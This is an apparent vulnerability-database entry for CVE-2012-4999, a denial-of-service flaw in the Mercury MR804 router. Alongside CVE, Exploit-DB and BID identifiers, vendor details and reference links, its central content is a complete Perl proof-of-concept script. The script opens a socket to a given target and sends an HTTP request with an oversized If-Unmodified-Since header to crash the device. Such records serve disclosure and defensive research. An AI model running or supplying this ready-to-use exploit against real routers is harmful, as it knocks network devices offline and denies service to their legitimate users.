ID
VAR-E-201202-0309
CVE
| cve_id: | CVE-2012-4999 | Trust: 1.9 |
EDB ID
36868
TITLE
Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities. CVE-2012-4999CVE-79870 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | mercury | model: | mr804 router | scope: | - | version: | - | Trust: 1.0 |
| vendor: | mercury | model: | mr804 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/52106/info
Mercury MR804 router is prone to multiple denial-of-service vulnerabilities.
Remote attackers can exploit these issues to cause the device to crash, denying service to legitimate users.
Mercury MR804 running version 3.8.1 Build 101220 is vulnerable.
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '* writed by demonalex@163.com *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple HTTP Header Fields Denial of Service Vulnerabilities
Trust: 1.0
CREDITS
demonalex
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 36868 | Trust: 1.9 |
| db: | NVD | id: | CVE-2012-4999 | Trust: 1.9 |
| db: | BID | id: | 52106 | Trust: 1.9 |
| db: | EDBNET | id: | 58160 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-4999 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/52106/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/36868/ | Trust: 0.6 |
| url: | http://www.mercurycom.com.cn/product/list?c=2 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/36868 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 52106 |
| db: | EXPLOIT-DB | id: | 36868 |
| db: | EDBNET | id: | 58160 |
LAST UPDATE DATE
2022-07-27T09:59:02.922000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 52106 | date: | 2012-09-21T18:20:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 52106 | date: | 2012-02-21T00:00:00 |
| db: | EXPLOIT-DB | id: | 36868 | date: | 2012-02-21T00:00:00 |
| db: | EDBNET | id: | 58160 | date: | 2012-02-21T00:00:00 |